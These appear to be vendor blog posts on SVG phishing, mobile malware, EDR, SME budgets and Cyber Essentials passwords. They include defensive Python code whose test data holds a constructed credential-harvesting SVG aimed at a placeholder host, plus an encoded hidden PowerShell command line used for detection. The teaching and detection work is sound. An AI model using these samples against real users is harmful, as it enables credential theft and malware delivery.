
What is SVG phishing and how do you defend against it?


Phishing is one of the oldest cybercrime techniques in the book. Indeed, the first phishing email is thought to have originated back in the mists of time, around the year 1995. However, that doesn’t mean cybercriminals haven’t got creative in the years since. Added to recent innovations like smishing and Facebook Messenger scams, there’s a new threat to contend with: SVG phishing.

Here’s everything you need to know about this new threat, including what it is, how it works and, most importantly, how to counter it.

What is SVG phishing?

SVG phishing refers to the use of Scalable Vector Graphics (SVG) files in phishing attacks. SVG is an XML-based file format for two-dimensional graphics, popular in web and graphic design because images scale up and down without losing quality. The security-relevant difference from a JPEG or PNG is that an SVG is a text document, not a bitmap: it can contain hyperlinks, embedded HTML (via the foreignObject element) and JavaScript, and when a user opens one directly it is rendered by the web browser, which treats it much like any other web page.

Cybercriminals use these files to deliver malware or to direct victims to spoofed login forms that steal their credentials.

Why do cybercriminals use SVG phishing attacks?

SVG phishing has gained traction in the cyber underworld because it evades traditional security measures. Many email filters treat an SVG as an image rather than as a document that can carry script, so they inspect it far less closely than they would a PDF or Office attachment. This allows phishing emails carrying SVG attachments to bypass many email filters, giving cybercriminals a route into target organisations.

How do SVG phishing attacks work in practice?

In practice, SVG attacks work much like any other phishing scam. Typically, a cybercriminal disguises the SVG files as legitimate documents or requests, using social engineering techniques to convince victims to open them.

It could be a request to edit a file from your ‘boss’ or a report that ‘requires your attention right now’. Either way, the techniques aren’t any more sophisticated than those of a typical phishing scam.

Once opened in a browser, the file’s embedded JavaScript runs: it can redirect the user to a malicious website, display a fake login form that captures passwords, or fetch a malware payload onto the machine. The same file is harmless when it is merely displayed as a picture inside a web page or email client, because browsers do not run scripts in an SVG loaded through an img tag. The danger is opening the attachment directly.

However, while many SVG attacks aren’t particularly sophisticated, cybercriminals are getting smarter about how they launch them. There is evidence of campaigns using SVG images that mimic documents like Excel spreadsheets, with embedded forms for credential harvesting.

Are there any famous examples?

SVG phishing techniques have been in use since at least 2015, but media reports tend not to differentiate them from other types of phishing. Nevertheless, there are a couple of recent examples that researchers have identified.

1. Agent Tesla Keylogger:  January – February 2024

Agent Tesla is a keylogger. It monitors keystrokes, takes screenshots, and steals passwords from various applications before sending the data back to the attackers. It’s not new malware; cybercriminals have been using it since around 2014, but in 2024 they started delivering it via SVG files.

This campaign used an SVG disguised as a Microsoft Excel spreadsheet, delivered via phishing emails. Once the victim opened the file, its embedded script ran and fetched Agent Tesla.

2. XWorm RAT:  December 2023 – present

The catchily named XWorm RAT is a remote access trojan used for, among other things, keylogging and stealing cryptocurrency wallets.

These campaigns used various techniques. Some used links embedded in phishing emails, and others included SVG files as attachments. Once opened, these SVG files initiated the download of zip archives containing XWorm RAT, unleashing the malware on the victim. 

For more examples of real-world SVG campaigns, we recommend checking out Cofense’s excellent phishing database.

What can you do to protect your business? 

There’s no doubt SVG phishing poses a serious threat, able to avoid detection by many email filtering tools. But that doesn’t mean there’s nothing you can do to protect your business.

Staff training

We’re always championing the benefits of staff security training, but it’s particularly important when it comes to phishing. By their nature, phishing campaigns rely on social engineering so, if you can train staff to recognise the tell-tale signs, you blunt most of the threat before any technical control is needed.

What training looks like will depend on the expertise within your organisation. You could implement realistic phishing simulations to test employee awareness, or something simpler like webinars and videos. However you approach it, the key is that employees can quickly recognise suspicious emails and attachments, and understand that an attachment being an ‘image’ does not make it safe.

Limit SVG Handling

One of the most effective mitigations is to limit what happens when an SVG is opened. Browsers run the scripts inside an SVG only when the file is opened as a document in its own right (double-clicked, or loaded in a tab), not when it is displayed as an image. So change the default handler for .svg files on staff machines from the browser to an image viewer or editor, and block or quarantine .svg attachments at the email gateway unless a team genuinely needs them. If the attachment never reaches a browser, hidden nasties like Agent Tesla or XWorm RAT never get to run their downloader.

Configure email filtering

In a similar vein, more advanced email security solutions can analyse attachments for malicious content. Check whether yours actually parses SVG attachments rather than waving them through as images: the things to look for are script elements, event-handler attributes such as onload, foreignObject blocks carrying HTML forms, and links or javascript: URIs. Many email providers can’t do this yet, which is part of the reason for the success of SVG phishing campaigns.
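The checks just described, and the scripting features explained under ‘How do SVG phishing attacks work in practice?’, as an added example that is not code from the original article or from any email security product. It walks the XML of an SVG with the Python standard library and reports script elements, event-handler attributes, embedded HTML (foreignObject), javascript: links, form targets and external URLs. The two sample SVGs are constructed for this example, and the domain login-example.invalid is a reserved placeholder, not a real site.

```python
"""Scan SVG attachments for the features SVG phishing relies on."""
import re
import xml.etree.ElementTree as ET  # for untrusted input in production, prefer defusedxml

# Elements that let an SVG behave like a web page instead of a picture.
ACTIVE_ELEMENTS = {"script", "foreignObject", "iframe", "object", "embed"}
# Attributes that carry a destination the browser will follow or submit to.
LINK_ATTRS = {"href", "action", "formaction"}
DANGEROUS_SCHEME = re.compile(r"^\s*(javascript|vbscript|data)\s*:", re.IGNORECASE)


def local_name(qualified):
    """Strip the {namespace} prefix ElementTree puts on tags and attributes."""
    return qualified.rsplit("}", 1)[-1]


def scan_svg(svg_bytes):
    """Return a list of findings; an empty list means only drawing content was found."""
    try:
        root = ET.fromstring(svg_bytes)
    except ET.ParseError as exc:
        # A file that calls itself an image but is not well-formed XML is itself suspicious.
        return [f"unparseable XML: {exc}"]

    findings = []
    for element in root.iter():  # document order, root included
        name = local_name(element.tag)
        if name in ACTIVE_ELEMENTS:
            findings.append(f"<{name}> element present")
        for attr, value in element.attrib.items():
            attr_name = local_name(attr)
            if attr_name.startswith("on"):
                # onload, onclick, onmouseover, ... run script without any <script> element
                findings.append(f"event handler {attr_name} on <{name}>")
            elif attr_name in LINK_ATTRS:
                if DANGEROUS_SCHEME.match(value):
                    scheme = value.split(":", 1)[0].strip().lower()
                    findings.append(f"{scheme}: URI in {attr_name} on <{name}>")
                elif value.lower().startswith(("http://", "https://")):
                    findings.append(f"external {attr_name} to {value} on <{name}>")
    return findings


# Constructed sample: a genuine drawing, nothing to report.
BENIGN_SVG = b"""<svg xmlns="http://www.w3.org/2000/svg" width="100" height="100">
  <circle cx="50" cy="50" r="40" fill="green"/>
  <text x="10" y="95">logo</text>
</svg>"""

# Constructed sample of the pattern described in the article: a file that looks like a
# spreadsheet but redirects on load, wraps the canvas in a javascript: link and embeds an
# HTML credential form. The URLs point at a reserved placeholder domain.
PHISHING_SVG = b"""<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink"
     width="800" height="600" onload="window.location='https://login-example.invalid/'">
  <text x="10" y="20">Invoice_Q1.xlsx - click to open</text>
  <a xlink:href="javascript:window.open('https://login-example.invalid/')">
    <rect width="800" height="600" fill="white"/>
  </a>
  <foreignObject x="0" y="40" width="400" height="200">
    <form xmlns="http://www.w3.org/1999/xhtml" action="https://login-example.invalid/post" method="post">
      <input name="email" type="text"/><input name="password" type="password"/>
    </form>
  </foreignObject>
  <script type="text/javascript">document.title = 'Sign in to view document';</script>
</svg>"""


if __name__ == "__main__":
    for label, svg in (("benign", BENIGN_SVG), ("phishing", PHISHING_SVG)):
        findings = scan_svg(svg)
        print(f"{label}: {'QUARANTINE' if findings else 'allow'}")
        for finding in findings:
            print("  -", finding)
```

Any non-empty result is grounds to quarantine the attachment: a legitimate logo or chart has no reason to carry script, event handlers or a form. The parser deliberately reports every hit rather than stopping at the first, so an analyst sees the whole chain (redirect on load, click-jacked canvas, credential form) in one place.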

Use CDR Technology

Admittedly, this solution is likely to be beyond the budget of most small businesses. Content Disarm and Reconstruction (CDR) solutions are expensive and tend to be the preserve of large corporations and organisations that need to spend heavily on security.

But if you can afford it, CDR is a good option for disarming SVG phishing. CDR systems treat every incoming file as potentially harmful. They take each file apart, keep only the content a user actually needs (for an SVG, the drawing instructions), discard anything active such as scripts and embedded HTML, and rebuild a clean copy before passing it on to the recipient.

Put policies in place 

If your staff don’t understand the dangers of SVG files or the safe behaviours expected of them, they’re much more likely to fall prey to a scam.

Develop policies for handling email attachments, especially those from unknown or dubious sources. You could also consider restricting certain file types in email communications unless they’re absolutely necessary for operations. 
Once you’ve set these policies, you need to ensure employees adhere to them. The best way to do this is to make them readily available (they’re no use buried in a long-forgotten corner of a shared drive) and log who’s read them. 

Dangerous, but avoidable...

SVG phishing is dangerous, but it doesn’t have to be an insurmountable problem. By implementing these strategies, your business can significantly reduce the risks and protect company data.

Want to know more about the threats facing small businesses like yours? Check out our latest research report on the mobile threats facing SMEs.

What is mobile malware, and how do you protect against it?


Mobile devices are essential to the hybrid workforce. Having remote access to critical business systems and data enables teams to communicate, collaborate, and work more efficiently – wherever they are. But this convenience also makes mobile devices an ideal target for cybercriminals. 

Among the growing list of threats, mobile malware is perhaps the most prevalent.

What is mobile malware?

Mobile malware is the umbrella term for malicious software specifically designed to target smartphones, tablets, and similar devices. It comes in various forms:

  • Viruses
  • Ransomware
  • Spyware
  • Trojan Horses
  • Worms

Cybercriminals employ a range of methods to deliver their payloads. These include disguising malicious software as legitimate apps, which compromise your device once installed, and concealing malicious links or attachments in phishing emails and SMS messages. Typically, the attacker’s goal is to:

  • Lock or delete important files
  • Steal sensitive data or hold it to ransom
  • Steal bank account details or financial information
  • Damage or hijack business devices
  • Spy on rival businesses

iOS vs Android: what’s more secure?

iOS generally presents the harder target. In most regions it restricts app installation to the App Store, reviews apps before publication, sandboxes them tightly, and Apple ships patches to every supported device at once. Android allows sideloading from outside Google Play, and its patches reach handsets through manufacturers and carriers at varying speeds. That larger attack surface, rather than the fact that Android’s source code is open, is why most mobile malware targets Android. However, neither operating system is infallible.

Common signs of infection

Mobile malware can cause serious harm if left unchecked – from costly operational downtime to reputational damage, fines, and even legal action. So, it’s crucial you know how to spot the signs of infection.

Give your device a thorough health check if you see any of these symptoms.

  • Poor performance
  • Drained battery
  • Overheating
  • Frequent crashing
  • Persistent pop-ups
  • Suspicious app downloads
  • Unexplained charges


8 tips to protect your business devices

Protecting your business devices against mobile malware doesn’t have to be time-consuming or expensive. From using secure Wi-Fi to investing in dedicated mobile device security, here are some quick, cost-effective steps to strengthen your defences.

1. Install security patches immediately

Apple and Android devices receive regular security patches, roughly monthly. These critical updates fix flaws and vulnerabilities in your device’s operating system. Install them as soon as possible, or switch on automatic updates, to close known gaps in your security. On Android, how quickly a patch reaches a handset depends on the manufacturer and carrier, so check that your devices are still receiving updates at all; a phone that has fallen out of support never gets fixed.

2. Only use trusted apps

Unregulated, third-party app stores are a haven for mobile malware and other cybersecurity threats. Mitigate this risk by enforcing security policies that require employees to use trusted storefronts, like the Apple App Store and Google Play, and by disabling installation from unknown sources on Android devices.

3. Avoid suspicious links and attachments

As obvious as it might sound, you can significantly reduce your cybersecurity risks by avoiding suspicious links and attachments. If you don’t recognise the sender’s email address, notice something strange about the message, or receive an unusual request, don’t click. It’s better to be safe than sorry.

4. Enforce a strong password policy

Have you ever used a well-known phrase as a password? Maybe a pet’s name? Perhaps you use the same one for every account? Don’t worry; there’s no judgement here. No one really likes passwords, but they’re a crucial component of mobile security.

Keep your devices and data secure by implementing a strong password policy that requires employees to use unique, complex passwords for every device. Follow these best practices to make them easier to manage:

  • Use a combination of three or more random words, as in the NCSC’s ‘three random words’ guidance. E.g. fenceplanetoctopussauce
  • Use a mixture of upper- and lower-case letters, numbers, and special characters
  • Use a dedicated password manager to generate passwords for you and store them in a secure vault

5. Enable multi-factor authentication

Strong passwords alone may not be enough to deter tenacious cybercriminals. For added protection, enable multi-factor authentication (MFA) on your business devices and accounts. This requires employees to present two or more different kinds of verification:

  • Something they know: a password or PIN
  • Something they have: a software token or authenticator app
  • Something they are: biometrics (e.g., a fingerprint or face scan)

Note that a password plus a PIN is not MFA; both are things the user knows, so a phisher who captures one can usually capture the other.

6. Use password-protected Wi-Fi

Public networks are a convenient gateway to the internet, but anyone else on them can observe or tamper with unencrypted traffic. To prevent cybercriminals from intercepting sensitive messages or launching man-in-the-middle attacks, ensure employees only use Wi-Fi networks protected with WPA2 or WPA3 encryption when working away from the office. If that isn’t possible, use a virtual private network (VPN) to encrypt all of the device’s traffic and prevent unauthorised access.

7. Train your employees

68% of breaches involve a human element, according to Verizon’s 2024 Data Breach Investigations Report. So, running regular training sessions that teach staff how to identify and respond to cyber risks goes a long way to mitigating them. This includes when and how to share sensitive data, how to spot phishing attempts, and what to do if they suspect their device is infected.

8. Install mobile cybersecurity software

For the highest level of security, you can’t beat dedicated mobile device security software. Designed specifically for smartphones and tablets, it constantly scans devices for common security risks, such as:

  • Misconfigurations
  • System vulnerabilities
  • Suspicious apps
  • Malicious content

It can also block untrustworthy websites and repel attacks in real-time. This gives you more time to respond if something does get past your defences.

Mitigate the mobile malware threat

Mobile malware attacks continue to rise as more employees use their smartphones for work. But by understanding the threat and adopting these simple measures, you can enjoy the benefits of hybrid working safely and securely.

Want to know more about mobile specific threats your business faces? Check out our SME Mobile Threat Report.

Endpoint detection and response: what is it and why do you need it?


Desktop computers, laptops, and mobile devices, collectively known as endpoints, are often the first port of call for hackers looking to launch a cyber-attack. They treat them as a convenient gateway into your systems.

However, there are ways to defend your business. And the most effective is with dedicated endpoint detection and response (EDR).

What is endpoint detection and response?

Coined by Gartner’s Anton Chuvakin in 2013, endpoint detection and response is a branch of cybersecurity technology that continuously records what happens on each device, detects threats in that activity, and gives security teams the means to respond.

Where traditional antivirus checks files against known signatures at the moment they are written or run, EDR records what happens on the device continuously: which processes start, what they connect to, what they change. It analyses that stream of telemetry in real time to detect threats and, when it finds one, responds, automatically or at an analyst’s command depending on how it is configured, by containing the threat before it can spread.

Want to know more about protecting your business on a budget? Check out our guide.

How does it work?

Most endpoint detection and response solutions follow the same basic approach, even if their capabilities differ.

Step 1. Data collection

Working quietly in the background, the software collects data from each device on your network. This includes:

  • Process creation, including command lines and parent processes
  • Authentication requests
  • Network connections
  • File and registry changes
  • Configuration changes
  • Device performance

Then, it consolidates everything into a central database for easy access.

Step 2. Analysis and detection

Next, the software analyses the data and compares the results against global threat intelligence to identify threat indicators. These typically fall into one of two categories:

  1. Indicators of compromise (IOC): signs that a threat has breached a system or endpoint.
  2. Indicators of attack (IOA): patterns or behaviours that signal a cyber-attack is about to happen or is in progress, regardless of which file carries it.

Security team members can access this information directly from the software, allowing them to monitor threats across your business in real time.

Step 3. Response

Should the EDR software flag a potential threat, it contains it, automatically or once an analyst confirms the alert, depending on how the tool is configured.

The nature of the response depends on the nature of the threat and your software’s capabilities. Typical responses include:

  • Notifying security personnel
  • Killing or suspending the offending process(es)
  • Disconnecting the affected device(s) from your network
  • Triggering an antivirus scan

Step 4. Investigation and remediation

With the threat contained, security teams are free to investigate it. Some EDR software generates comprehensive reports that allow you to track incidents back to their source. This helps you pinpoint the root cause, track its trajectory through your systems, and organise your response.

For example:

  • Patching the vulnerability
  • Updating detection rules
  • Deleting malicious files
  • Repairing or restoring damaged components

Step 5. Prevention and threat hunting

EDR software keeps detailed records of every incident. Security analysts can access this data at any time, learning from past incidents to prevent future ones. It also helps them:

  • Identify vulnerabilities
  • Track how specific threats develop over time
  • Support threat hunting exercises
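The five steps above in miniature, as an added example that is not any vendor’s EDR code. Constructed process-creation events (the telemetry of step 1) are run through an IOC check and three IOA rules (step 2); each hit becomes a response decision (step 3) and an incident-log entry for later investigation and hunting (steps 4 and 5). The hash in KNOWN_BAD_HASHES is a placeholder, and the hosts, process names and rules are this example’s own.

```python
"""A miniature EDR pipeline over constructed process-creation telemetry."""
from dataclasses import dataclass


@dataclass
class ProcessEvent:
    host: str
    parent: str    # image name of the parent process
    image: str     # image name of the new process
    cmdline: str
    sha256: str


@dataclass
class Detection:
    host: str
    image: str
    reasons: list
    severity: str
    actions: list


# Indicator of compromise: hashes supplied by threat intelligence.
# Placeholder value for this example, not a real malware hash.
KNOWN_BAD_HASHES = {"d" * 64}

# Indicators of attack: behaviours that accompany an intrusion whatever file carries them.
OFFICE_APPS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}
SCRIPT_HOSTS = {"powershell.exe", "cmd.exe", "wscript.exe", "cscript.exe", "mshta.exe"}


def ioc_matches(event):
    return event.sha256.lower() in KNOWN_BAD_HASHES


def ioa_matches(event):
    """Return the behavioural rules the event trips (possibly none)."""
    hits = []
    parent, image, cmdline = event.parent.lower(), event.image.lower(), event.cmdline.lower()
    if parent in OFFICE_APPS and image in SCRIPT_HOSTS:
        hits.append("Office application spawned a script host")
    if image == "powershell.exe" and "-enc" in cmdline:          # -enc / -EncodedCommand
        hits.append("PowerShell launched with an encoded command")
    if image == "powershell.exe" and ("-w hidden" in cmdline or "-windowstyle hidden" in cmdline):
        hits.append("PowerShell launched with a hidden window")
    return hits


def triage(event):
    """Step 2 and 3: decide whether the event is a detection and what to do about it."""
    reasons = []
    if ioc_matches(event):
        reasons.append("IOC: SHA-256 matches threat intelligence")
    ioa_hits = ioa_matches(event)
    reasons += ["IOA: " + hit for hit in ioa_hits]
    if not reasons:
        return None
    # One IOC, or a chain of two or more suspicious behaviours, is enough to contain
    # automatically; a single behaviour only raises an alert for an analyst to look at.
    if ioc_matches(event) or len(ioa_hits) >= 2:
        severity, actions = "high", ["alert", "kill_process", "isolate_host"]
    else:
        severity, actions = "medium", ["alert"]
    return Detection(event.host, event.image, reasons, severity, actions)


def run_pipeline(events):
    """Steps 1 to 5 end to end: consume telemetry, triage it, return detections and the log."""
    detections, incident_log = [], []
    for event in events:
        detection = triage(event)
        if detection:
            detections.append(detection)
            incident_log.append(
                f"{detection.host}: {detection.severity} - "
                f"{'; '.join(detection.reasons)} -> {', '.join(detection.actions)}"
            )
    return detections, incident_log


# Constructed telemetry: one benign launch, one phishing-style macro chain, one known-bad
# binary, and one ordinary admin use of PowerShell that must not be flagged.
SAMPLE_EVENTS = [
    ProcessEvent("ws-01", "explorer.exe", "chrome.exe", "chrome.exe", "a" * 64),
    ProcessEvent("ws-02", "EXCEL.EXE", "powershell.exe",
                 "powershell.exe -NoP -W Hidden -Enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoA", "b" * 64),
    ProcessEvent("ws-03", "explorer.exe", "update.exe", "update.exe /silent", "d" * 64),
    ProcessEvent("ws-04", "explorer.exe", "powershell.exe", "powershell.exe -Command Get-Process", "c" * 64),
]

if __name__ == "__main__":
    _, log = run_pipeline(SAMPLE_EVENTS)
    for line in log:
        print(line)
```

The point of the two indicator types shows in the sample: ws-03 is caught only because its hash is on a list (an IOC, useless against a recompiled sample), while ws-02 is caught purely on behaviour (Excel spawning a hidden, encoded PowerShell), which keeps working however the payload is repacked. ws-04 runs PowerShell too and is left alone, which is the balance real rules have to strike.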

Benefits of endpoint detection and response

Identify blind spots

At the highest level, endpoint detection and response is all about visibility. It lets you monitor every device in real time, highlighting misconfigurations and unsecured connections cybercriminals can exploit. With this information, you can plug gaps in your defences and put in place measures to prevent similar cases in future.

Spot emerging threats

Antivirus software is great at detecting known threats. It does this by comparing the threat’s unique signature against global threat intelligence databases.

However, this makes it less effective against new or modified malware whose signature isn’t in the database yet, and blind to attacks that involve no malicious file at all, such as an intruder misusing PowerShell or a legitimate admin tool after a successful phishing email.

By contrast, EDR identifies threats by looking for suspicious activity and behaviour. This means it can detect new and established threats alike, including the post-compromise activity that follows a phish.

Block sophisticated attacks

Endpoint detection and response software combats advanced threats, putting it ahead of basic antivirus tools. This includes stealthy malware that can go unnoticed for months, waiting for the right opportunity to strike, or that adapts its behaviour to avoid detection.

Minimise or prevent damage

As an automated solution, EDR reduces the delay between threat detection and mitigation. Once it identifies a potential threat, the software immediately takes steps to contain and neutralise it. This prevents attacks from escalating, minimising the damage to your business and saving you from a costly clean-up operation. 

Your first line of defence

Even the most advanced antivirus software can’t catch every threat. New tactics and attack vectors emerge every day, some of which will make it past your security perimeter. 

Endpoint detection and response software works in tandem with your existing security tools. It forms a vital layer in your defence network, spotting the sophisticated threats traditional antivirus can’t see to keep your network, systems, and data safe.


Cybersecurity budgets for SMEs: Are we doing enough to make the case?


Cybersecurity is a growing concern for businesses of all sizes, but the situation is particularly challenging for small and medium-sized enterprises (SMEs). Limited resources often mean smaller budgets for cybersecurity, leaving these organisations vulnerable to increasingly sophisticated cyberattacks. As a cybersecurity professional, whether you’re an MSP or consultant, you've likely faced the frustrating reality of tight budgets, even when the risks are clear.

A recent report by ISACA reveals a troubling statistic. 52% of cybersecurity professionals in Europe believe their organisation’s budget is insufficient. Yet, 58% of organisations expect to face an attack within the next 12 months. This disconnect suggests that many budget holders are still unconvinced of the need for stronger security measures.

In this blog, we’ll explore why cyber security budgets in SMEs tend to be lower, the misconceptions that drive this, and how you can better educate businesses as a cyber security professional. You’ll also discover practical ways to work within limited budgets while delivering effective protection.

Planning a cybersecurity budget

When it comes to cybersecurity, many SMEs operate under the belief that paying for basic protection is enough to keep them safe. “I pay for cybersecurity, so I’m secure,” is a common but misguided sentiment. In reality, most SMEs are just as much at risk as larger enterprises, yet their budgets are often disproportionately lower.

The reasons behind this are understandable. SMEs typically have fewer resources and often prioritise immediate business needs over long-term risks. However, as cyber threats grow more frequent and sophisticated, underfunding cybersecurity is a dangerous gamble. 

For cybersecurity professionals, the key challenge is not just to provide solutions but to effectively communicate the real-world impacts of insufficient protection. Businesses need to understand that the risk isn’t hypothetical. Recent data shows that 41% of businesses experienced more cyberattacks in the last year alone. 

This is where education becomes essential. By using statistics and real-life examples, you can help budget holders grasp the true risks and long-term costs of an attack, which often far outweigh the cost of prevention.

During the planning phase, we should consider risk assessments to help businesses understand their unique vulnerabilities. You can then use this information to tailor security solutions that align cybersecurity measures with a customer’s specific budget and needs. 

However, education is the most important thing. Take the time to explain how even a small increase in budget can significantly reduce risk.

Allocating a budget and prioritising

When budgets are tight, it’s crucial to help SMEs prioritise the areas where investment will have the greatest impact. To start, businesses must understand the cost of an attack. 

Downtime, reputational damage, and the cost of recovery can devastate a small business. For instance, ransomware attacks can result in 22 days of downtime on average, a crippling scenario for any SME. By outlining these potential outcomes, you can paint a clearer picture of the necessity of increased investment in cybersecurity.

When working within a limited budget, focus on the fundamentals. Schemes such as Cyber Essentials provide this, which is why the controls within this scheme are often described as the foundations of cybersecurity for any business.

Controls such as multi-factor authentication (MFA) protect against the most common entry points for attackers. Applying updates promptly (Cyber Essentials requires patches for high and critical vulnerabilities to be installed within 14 days of release) sharply reduces the chance of an attacker exploiting a known hole in third-party software.

One of the most cost-effective ways to reduce risk is to educate employees about cyber threats, in particular how to recognise and respond to phishing attempts.

In short, the key is to ensure that budget holders understand the return on investment of cybersecurity. Investing in protection now will likely save them from much larger costs in the future.

Common mistakes and misconceptions

The mindset of small businesses thinking they are too small to be attacked puts organisations at risk and makes it harder for cybersecurity professionals to justify larger budgets.

Another frequent error is assuming that simply paying for a cybersecurity service guarantees complete protection. In reality, cybersecurity is not a one-and-done solution, it requires continuous monitoring, updating, and adjusting. Security professionals must guide businesses away from these misconceptions and towards a more realistic understanding of their vulnerabilities.

For example, a small business might believe that because they’ve installed antivirus software or a firewall they’re fully protected. However, the continuously evolving threat landscape means that yesterday’s security measures are often inadequate for today’s attacks. 

Part of a security professional's job is to clarify that cybersecurity is an ongoing process. Regular assessments, updates, and education are crucial to keeping an SME safe from the constantly changing tactics of cybercriminals.

Optimising cybersecurity investments

Even with a limited budget, there are ways to maximise the effectiveness of a business's cyber security investments. Cybersecurity professionals have the opportunity to help businesses make the most of what they have while still ensuring adequate protection.

Start with cost-effective security tools that offer solid protection, so businesses get the best value for their investment. Tools such as CyberSmart Active Protect provide vulnerability management, security awareness training and policy management.

Often, the biggest vulnerabilities in an organisation aren’t its systems but its people. Using the free resources CyberSmart offers, such as white papers, blogs and webinars, gives employees regular training on current threats and how to protect against and respond to them. This can greatly reduce the risk of an attack.

By helping businesses invest wisely, we can ensure they get the best possible protection within their financial constraints. It’s about balancing short-term costs with the long-term need for security and showing businesses that even a modest increase in their cyber security budget can significantly reduce their risk of a costly attack.

As cyber threats continue to grow, SMEs can no longer afford to view cyber security as an optional or secondary concern. The consequences of a successful attack can be devastating, and yet many businesses are still under-investing in their security measures. 

How to help your customers

For cybersecurity professionals, the task is twofold: educating businesses on the real risks they face and helping them allocate their budgets effectively. By focusing on clear communication, prioritising essential security measures, and optimising available resources, you can ensure that even the smallest budgets deliver real protection.

In the end, the key message to convey to businesses is simple: cybersecurity is an investment, not just a cost. And with the right approach, even a limited budget can provide meaningful protection against today’s ever-evolving cyber threats.

Want to know more about how to keep your customers safe on a smaller budget? Check out our guide to cybersecurity on a budget.

Cyber Essentials password policy best practices


One of the key aspects of securing your workforce is implementing strong passwords that comply with Cyber Essentials password policy best practices.

Cyber Essentials is a UK government-backed certification scheme that helps businesses protect themselves from the most common online threats.

Why adopt Cyber Essentials password policy recommendations?

A weak password can be the difference between a secure system and a damaging data breach.

Cyber Essentials provides guidelines that help businesses protect themselves against cyber threats. Following them can reduce the risk of unauthorised access by ensuring your systems are as secure as possible.

Cyber Essentials password requirements

To get certified, your business must implement a password policy that meets the following requirements: 

1. Password strength

Cyber Essentials does not mandate complexity rules such as mixing symbols and numbers. Instead it asks for length and a block on obvious choices: a minimum of 12 characters with no maximum length, or a minimum of 8 characters combined with either MFA or an automatic deny list of common passwords. The NCSC’s three random words approach is an easy way to meet the 12-character route, and a randomly generated password from a password manager works equally well. The key is that your passwords are long and near-impossible to guess.

2. Unique credentials

Reusing passwords across multiple personal and company accounts presents a major risk. If a hacker gets hold of them, they could gain access to sensitive data.

Cyber Essentials requires all employees to use unique passwords for every account. Password managers can help employees maintain unique passwords without the burden of remembering them all. 

3. Account lockout mechanisms

Cyber Essentials requires protection against brute-force attacks, where attackers guess passwords by trying many combinations. Two approaches are acceptable: throttling login attempts so that no more than 10 guesses are possible in five minutes, or locking the account after no more than 10 unsuccessful attempts. A lockout temporarily blocks the account, requiring a reset or additional verification to regain access.

4. Multi-factor authentication

Multi-factor authentication (MFA) adds an essential layer of security by requiring users to verify their identity with two or more different kinds of evidence: something they know (a password), something they have (an authenticator app or hardware token) or something they are (a fingerprint). A password plus a PIN does not count, since both are things the user knows.

Cyber Essentials requires MFA for all cloud service accounts where the service supports it, and strongly recommends it for access to every other critical system. This ensures that even if a hacker obtains a password, they can’t access sensitive data without the second verification step.
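The four requirements above turned into checks you can run against a system’s settings, as an added example that is not part of the original article or of the scheme’s own materials. The thresholds encode the published Cyber Essentials rules for password-based authentication (no maximum length; 12+ characters, or 8+ characters with a deny list of common passwords, or 8+ characters with MFA; and brute-force protection of no more than 10 guesses in five minutes or lockout after no more than 10 failures). The deny list is constructed for the example, and the function and class names are this example’s own.

```python
"""Check a password policy and a login throttle against the Cyber Essentials requirements."""
import time

# Constructed deny list; in production use a large breached-password list.
COMMON_PASSWORDS = {"password", "password1", "qwerty123", "letmein", "welcome1", "admin123"}


def policy_compliant(min_length, max_length, deny_list_enforced, mfa_enforced):
    """Return (compliant, route) for a system's password settings."""
    if max_length is not None:
        return False, "a maximum password length is not permitted"
    if mfa_enforced and min_length >= 8:
        return True, "MFA with minimum 8 characters"
    if min_length >= 12:
        return True, "minimum 12 characters"
    if min_length >= 8 and deny_list_enforced:
        return True, "minimum 8 characters with a deny list of common passwords"
    return False, "no compliant option met: raise the minimum length, add a deny list or enforce MFA"


def password_acceptable(password, min_length=12, deny_list=COMMON_PASSWORDS):
    """Check one candidate password: long enough, and not an obvious choice.

    Cyber Essentials only mandates the deny list on the 8-character route, but
    rejecting 'password1' costs nothing whichever route you take.
    """
    if len(password) < min_length:
        return False, f"shorter than {min_length} characters"
    if password.lower() in deny_list:
        return False, "on the common-password deny list"
    return True, "ok"


class LoginThrottle:
    """Brute-force protection: lock a user out after too many failures in a window.

    Defaults are the scheme's ceiling: 10 failures within five minutes triggers a lock.
    `now` is injectable so the behaviour can be tested without waiting.
    """

    def __init__(self, max_attempts=10, window_seconds=300, lockout_seconds=900):
        self.max_attempts = max_attempts
        self.window = window_seconds
        self.lockout = lockout_seconds
        self._failures = {}      # user -> timestamps of recent failed attempts
        self._locked_until = {}  # user -> time the lock expires

    def attempt(self, user, password_correct, now=None):
        """Record one login attempt and return 'ok', 'denied' or 'locked'."""
        now = time.monotonic() if now is None else now
        if self._locked_until.get(user, 0) > now:
            return "locked"           # refuse even a correct password while locked
        if password_correct:
            self._failures.pop(user, None)
            return "ok"
        recent = [t for t in self._failures.get(user, []) if now - t < self.window]
        recent.append(now)
        self._failures[user] = recent
        if len(recent) >= self.max_attempts:
            self._locked_until[user] = now + self.lockout
            self._failures.pop(user, None)
            return "locked"
        return "denied"


if __name__ == "__main__":
    print(policy_compliant(min_length=8, max_length=16, deny_list_enforced=True, mfa_enforced=True))
    print(policy_compliant(min_length=12, max_length=None, deny_list_enforced=False, mfa_enforced=False))
    print(password_acceptable("fenceplanetoctopus"), password_acceptable("Password1", min_length=8))
    throttle = LoginThrottle()
    print([throttle.attempt("alice", False, now=float(i)) for i in range(10)])
```

The first policy call fails on the maximum-length rule alone, even though it enforces both MFA and a deny list: a cap on password length is a non-starter under the scheme because it stops users choosing long passphrases. The throttle refuses a correct password while the lock is in force, which is deliberate; otherwise an attacker who has already guessed the password could use it to clear their own lockout.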

Implementing a CE password policy

Creating a Cyber Essentials-compliant password policy is the first step to securing your business. But ensuring your team adheres to it requires careful planning and execution. 

1. Employee training and awareness

Even the strongest password policy can fail if employees don’t know how to use it or where to find it. Every team needs regular training and reminders about the importance of strong passwords and the specific policy requirements.

Consider running interactive training sessions, webinars, and regular cybersecurity newsletters to keep employees informed and engaged. Highlight real-world examples of password-related breaches to emphasise the importance of compliance.

2. Password management tools

Managing multiple, complex passwords can be daunting. Password management tools offer a secure way to store and retrieve passwords, reducing the temptation to reuse or simplify them. 

These tools generate strong, random passwords for each account and store them securely. This makes it easier for employees to adhere to Cyber Essentials password policy best practices without sacrificing convenience. 

3. Monitoring and support

Implement monitoring tools that allow your IT team to oversee compliance and respond quickly to potential issues.

